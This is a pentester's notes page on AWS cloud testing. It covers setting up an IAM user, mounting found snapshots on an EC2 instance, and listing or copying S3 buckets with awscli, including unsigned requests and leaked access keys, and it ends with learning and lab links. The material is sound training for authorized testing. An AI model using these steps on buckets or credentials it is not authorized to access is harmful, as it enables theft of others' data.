CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • How to create an AWS account
  • Create and ec2 instance
  • Connect to a bucket
  • Resources
  • AWS documentation
  • Learning resources
  • Tools
  1. Cloud Pentest

AWS

PreviousGoogle Cloud PlatformNextThick Client

Last updated 1 year ago

How to create an AWS account

In order to be able to query an s3 bucket that has misconfigured permissions like for example that gives access to its bucket to any authenticated user, we need to create a user in AWS (this is free)

  1. Create a free account on Amazon (check out the resources below for help on this step)

  2. Head to the IAM console

  3. Go to "users" > "Add users" and follow the whole process it should be pretty straight forward refer to in case you hesitate about something.

  4. Make sure you kept all the infos about your user on your password manager you will need for awscli.

  5. In order for your user to be able to query other buckets you will need to give it permissions. You can do this by adding it to a group. Go to your user

  • Click on the tab "Groups"

  • Click on "add a user to groups"

  • Click on "create a group", create one an give it a name, it is really helpful to use the premaid permissions policies (I chose the one called AdministratorAccess)

  • Name your group add your user to it and you should be good to go!

Create and ec2 instance

If you stumble on a snapshot during a pentest, you will need to create an ec2 instance in order to access it.

This part is taken from executeatwill's walkthrough of flAWS.cloud. You can read it

Ensure under AWS IAM that AdministratorAccess permissions is added to user

Launch EC2 new instance on the region of the snapshot you found

Select “Free Tier”

Here under network I recommend that you authorize SSH traffic only from your IP range (if you choose 0.0.0.0/0 it will authorize anyone on the internet).

Add Storage of snapshot created: snapshot storage name: same name as the snapshot you found.

  • Now you just need to ssh to your new instance and mount the drive where you put the snapshot you found.

Once you're done, I recommend that you delete the snapshot

Connect to a bucket

  • If we found a key or buckets during enumeration, we need to check them and see if we can connect to them.

  • sudo apt install awscli install aws cli

  • aws configure --profile profilename create a profile with our configs from our created user

  • aws configure list check your current configuration

  • aws configure list --profile profilename check the config of a specific profile

  • aws s3 ls s3://target --profile profilename ls the content of a bucket

  • aws s3 ls s3://target --no-sign-request --region us-west-2

  • aws s3 --profile profilename cp s3://bucket/file . copy a file from a bucket to our local directory

  • aws s3 sync ss3://bucket/folder --profile profile . copy a full folder to our local directory

  • If you find private key (Access_key and secret_access_key) you can configure it in a new profile with the command aws configure --profile profilename

  • Then, you just need to aws --profile profilename s3 ls to list the content of its s3 bucket.

Resources

AWS documentation

Learning resources

General AWS resources

AWS Pentest

Vulnerable labs to practice on

Writeups

Create your lab

Tools

AWS Security

Example with the CTF made available by

https://console.aws.amazon.com/iam/
this documentation
here
flAWS
Create a free AWS account
Creating an IAM user in your AWS account
AWS Account and Access Keys
AWScli Documentation
AWS CLI EC2 Tutorial
My AWS Pentest Methodology by Lizzie Moratti
AWS on Hacktricks
AWS on Pentest Book
Cloud - AWS Pentest - Payload All The Things
Securing AWS: Discover Cloud vulnerabilities via Pentesting Techniques
Hacking the cloud by frichette_n
AWS Cloud Penetration Testing Explained with Example - Cloud Security Podcast
AWS Goat Cloud Pentesting - Cloud Security Podcast
Getting Started with Hacking AWS ECS! - Cloud Security Podcast
GETTING STARTED WITH HACKING AWS CLOUD - Cloud Security Podcast
Cloud Security - Attacks by Joas Antonio Santos
Offensive cloud, AWS by Lutzenfried
0xd4y by Segev Eliezer with plenty of posts about AWS Pentest
Offensive Security AWS Guide - Joas A Santos
Finding Treasures in Github and Exploiting AWS for Fun and Profit — Part 1 - Bhagavan Bollina
Finding Treasures in Github and Exploiting AWS for Fun and Profit - Part 2 - Bhagavan Bollina
Pentesting Cloud part 1 "Open to the public" CTF Walkthrough by Pawel Rzepa
AWS Privesc exploring odd features of the Trust Policy
Cloud Hacking: Hacking Amazon AWS - NahamSec
flAWS
flAWS2
CloudGoat - RhinoSecurityLabs
IAM Vulnerable - Bishopfox (you need to deploy it yourself)
AWSGoat - ine labs (you need to deplot it yourself in your own AWS instance)
My writeups on flAWS
My writeups on vulnmachines AWS cloud lab
AWS S3 CTF Challenges by Michael McCambridge
How to build a Cloud Hacking Lab - Beau Bullock
Cloudfox - Bishopfox
My arsenal of AWS Security tools by toniblyx
Pacu - RhinoSecurityLabs
AWS Security Study Plan - Jassics
Awesome AWS Security - Jassics
Breaking into Cloud Security by Nick Jones
Awesome Cloud Security by NextSecurity
Cloud Security Vulnerabilities - Ashish Rajan
AWS Security Notes by Segev Eliezer (0xd4y)
AWS Security Checklist
Administrator access
new instance
Free tier
Add storage
flAWS